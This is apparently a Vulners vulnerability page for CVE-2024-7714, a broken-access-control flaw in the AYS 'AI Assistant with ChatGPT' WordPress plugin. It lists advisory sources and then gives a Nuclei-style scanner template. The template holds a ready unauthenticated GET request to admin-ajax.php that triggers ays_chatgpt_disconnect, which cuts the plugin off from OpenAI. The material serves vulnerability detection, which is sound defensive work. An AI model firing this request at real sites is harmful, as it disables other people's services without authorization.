| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2024-7714 | 27 Sep 202409:03 | – | circl | |
| WordPress plugin AI Assistant with ChatGPT by AYS 安全漏洞 | 27 Sep 202400:00 | – | cnnvd | |
| CVE-2024-7714 | 27 Sep 202406:00 | – | cve | |
| CVE-2024-7714 AI Assistant with ChatGPT by AYS <= 2.0.9 - Unauthenticated AJAX Calls | 27 Sep 202406:00 | – | cvelist | |
| EUVD-2024-48594 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-7714 | 27 Sep 202406:15 | – | nvd | |
| CVE-2024-7714 | 27 Sep 202406:15 | – | osv | |
| WordPress AI ChatBot with ChatGPT and Content Generator by AYS Plugin <= 2.0.9 is vulnerable to Broken Access Control | 27 Sep 202400:00 | – | patchstack | |
| WordPress AI Assistant with ChatGPT by AYS plugin <= 2.0.9 - Unauthenticated AJAX Calls vulnerability | 27 Sep 202407:51 | – | patchstack | |
| PT-2024-38530 · Ays · Ai Chatbot With Chatgpt/Content Generator | 26 Sep 202400:00 | – | ptsecurity |
id: CVE-2024-7714
info:
name: AI Assistant with ChatGPT by AYS <= 2.0.9 - Unauthenticated AJAX Calls
author: s4e-io
severity: medium
description: |
The plugin lacks sufficient access controls allowing an unauthenticated user to disconnect the plugin from OpenAI, thereby disabling the plugin. Multiple actions are accessible: ays_chatgpt_disconnect, ays_chatgpt_connect, and ays_chatgpt_save_feedback
impact: |
Unauthenticated attackers can disconnect the plugin from OpenAI and manipulate plugin settings through unprotected AJAX endpoints, causing denial of service and disrupting ChatGPT assistant functionality.
remediation: |
Fixed in 2.1.0
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-7714
- https://wpscan.com/vulnerability/04447c76-a61b-4091-a510-c76fc8ca5664/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2024-7714
cwe-id: CWE-284
epss-score: 0.00848
epss-percentile: 0.5364
metadata:
verified: true
max-request: 1
vendor: ays-chatgpt-assistant-team
product: ays-chatgpt-assistant
framework: wordpress
publicwww-query: "/wp-content/plugins/ays-chatgpt-assistant"
tags: cve,cve2024,ays-chatgpt-assistant,wordpress,wp-plugin,wp,iac,vuln,ai
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?ays_chatgpt_assistant_id=1&action=ays_chatgpt_admin_ajax&function=ays_chatgpt_disconnect"
matchers:
- type: dsl
dsl:
- 'regex("^true$", body)'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100c363f3e295b609bfa11bbfed0244cce622d397a75f65d79274cd9913f5fa4b34022025fa568fabd99902383f0a1e6823a160f5c48a0488139028d8fbc60d80eef57a:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation